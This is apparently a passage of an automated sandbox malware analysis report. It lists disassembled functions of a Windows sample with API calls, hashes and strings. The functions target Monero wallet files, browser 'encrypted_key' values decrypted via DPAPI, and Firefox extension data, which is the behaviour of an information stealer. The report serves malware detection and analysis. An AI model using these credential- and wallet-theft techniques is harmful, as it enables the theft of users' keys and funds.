                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: e61f0a7bc8e4f8f82992ec727a738bc8aa29c6dd562cd418e7c8bc37f61412bd
                    • Instruction ID: 5b7046516843ff007af777529b17ad98bf1403908a710f0386bfbee2004dd4d9
                    • Opcode Fuzzy Hash: e61f0a7bc8e4f8f82992ec727a738bc8aa29c6dd562cd418e7c8bc37f61412bd
                    • Instruction Fuzzy Hash: B3E08670A4030CBFC704DB95DC0DE5977B8EB04701F0441A4FD0997240DA725E449B62
                    Function 00BCA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCA2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 00BCA3FF
                    • lstrlen.KERNEL32(00000000), ref: 00BCA6BC
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCA743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: dc596fab7794a28b57460ec7e31ee40eed650512a48969efc9271825794f8313
                    • Instruction ID: ca315cdc6c0857ed61db68234729c3f77a08b666fbcf15e1399674c9d11bcc8b
                    • Opcode Fuzzy Hash: dc596fab7794a28b57460ec7e31ee40eed650512a48969efc9271825794f8313
                    • Instruction Fuzzy Hash: 82E10E728101589ADB04FBA4DC92EEEB3BCAF14300F5081AAF51772191FF356A4DDB66
                    Function 00BCD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCD481
                    • lstrlen.KERNEL32(00000000), ref: 00BCD698
                    • lstrlen.KERNEL32(00000000), ref: 00BCD6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCD72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 119ed57c61129b18dcb9d870c9313aeabfef647720c6836331ba868e6cd6e28a
                    • Instruction ID: 16d9d82df0dfe7cd4bdb00e21b18b2078eff5211e335e3fe258573e034234cdc
                    • Opcode Fuzzy Hash: 119ed57c61129b18dcb9d870c9313aeabfef647720c6836331ba868e6cd6e28a
                    • Instruction Fuzzy Hash: 519134718101489BCB04FBA4DC92EEEB3B8AF14300F5041BAF50772291FF356A49DB66
                    Function 00BCD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCD801
                    • lstrlen.KERNEL32(00000000), ref: 00BCD99F
                    • lstrlen.KERNEL32(00000000), ref: 00BCD9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCDA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 6d7245e2d0ae766a260120bcee2fb986810055e8c514eb2e43b7363cde446425
                    • Instruction ID: 0a23272325be08baf0aa5fce3b2718e4e937b6f169a94447d2fd2c720b54100a
                    • Opcode Fuzzy Hash: 6d7245e2d0ae766a260120bcee2fb986810055e8c514eb2e43b7363cde446425
                    • Instruction Fuzzy Hash: 388123718101089BCB04FBA4DC92EEEB3B8AF14300F5445AAF407B6291FF756A49DB66
                    Function 00BCF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BE1580,00BE0D92), ref: 00BCF54C
                    • lstrlen.KERNEL32(00000000), ref: 00BCF56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 686669225d65302c408673b3b511891c8e8408fecefe70cef08faf7b59a3b373
                    • Instruction ID: 9ec37498d6e0e1805cfe3e1fb9d806ba2ff3bcb0b0212d34753fd0d552149279
                    • Opcode Fuzzy Hash: 686669225d65302c408673b3b511891c8e8408fecefe70cef08faf7b59a3b373
                    • Instruction Fuzzy Hash: E9513471D101489ADB04FBB4DC96DEDB3B8AF54300F4085B9F81667291FF346A09CBA6
                    Function 00BD3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: b69db36d0128499f6b4dd635a33c4d93a58f8d0dc4d610525d0c04846d6e2dc7
                    • Instruction ID: 9dba55bf2846615eb50b96a295e726dfe78f04cdaf35687e7213ed1dfd8b52df
                    • Opcode Fuzzy Hash: b69db36d0128499f6b4dd635a33c4d93a58f8d0dc4d610525d0c04846d6e2dc7
                    • Instruction Fuzzy Hash: 88416F71D10209AFCB04EFA5D885AEEF7F4EB04704F048069E41676391EB75AA45CFA2
                    Function 00BC9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BC9D39
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9AEF
                      • Part of subcall function 00BC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B01
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9B2A
                      • Part of subcall function 00BC9AC0: LocalFree.KERNEL32(?,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B3F
                      • Part of subcall function 00BC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC9B84
                      • Part of subcall function 00BC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BC9BA3
                      • Part of subcall function 00BC9B60: LocalFree.KERNEL32(?), ref: 00BC9BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: d3675514be1eb93f77164dc3df9bc6d5c4aad49a536d0e50a8607aff3c66ca5a
                    • Instruction ID: 2a8caba24e0dbddf643a755cd54908c4deb6c8c32d45fcfbf5291343ddf37cd3
                    • Opcode Fuzzy Hash: d3675514be1eb93f77164dc3df9bc6d5c4aad49a536d0e50a8607aff3c66ca5a
                    • Instruction Fuzzy Hash: 2B311EB5D10209ABDB04DBE4DC89FEEB7F8EB48304F1445ADE906B7241E7359A04CBA1
                    Function 00BD92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(00BD3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00BD3AEE,?), ref: 00BD92FC
                    • GetFileSizeEx.KERNEL32(000000FF,00BD3AEE), ref: 00BD9319
                    • CloseHandle.KERNEL32(000000FF), ref: 00BD9327
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID:
                    • API String ID: 1378416451-0
                    • Opcode ID: d5033f974a49a560ca7d1d61b0090e57761dc25f294a009a1a8c44afbb3915c5
                    • Instruction ID: 2dc6360ad4a40e650ff956b12da30b81c4e520c8fef49987158b51b9a29e4760
                    • Opcode Fuzzy Hash: d5033f974a49a560ca7d1d61b0090e57761dc25f294a009a1a8c44afbb3915c5
                    • Instruction Fuzzy Hash: 36F08C34E00308BBDB14DBB1DC48B9EB7F9EB48320F14C2A5B611A72C0E6B196408B45
                    Function 00BDC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __getptd.LIBCMT ref: 00BDC74E
                      • Part of subcall function 00BDBF9F: __amsg_exit.LIBCMT ref: 00BDBFAF
                    • __getptd.LIBCMT ref: 00BDC765
                    • __amsg_exit.LIBCMT ref: 00BDC773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00BDC797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: 9887d07de8dbd9e90ddb49f24371886aa2c4ede70d8cc5d4f0f7793046b54883
                    • Instruction ID: e41bca126a2859bbe08a0edadf2902de08a4a10d3f4152727365839a01267ab2
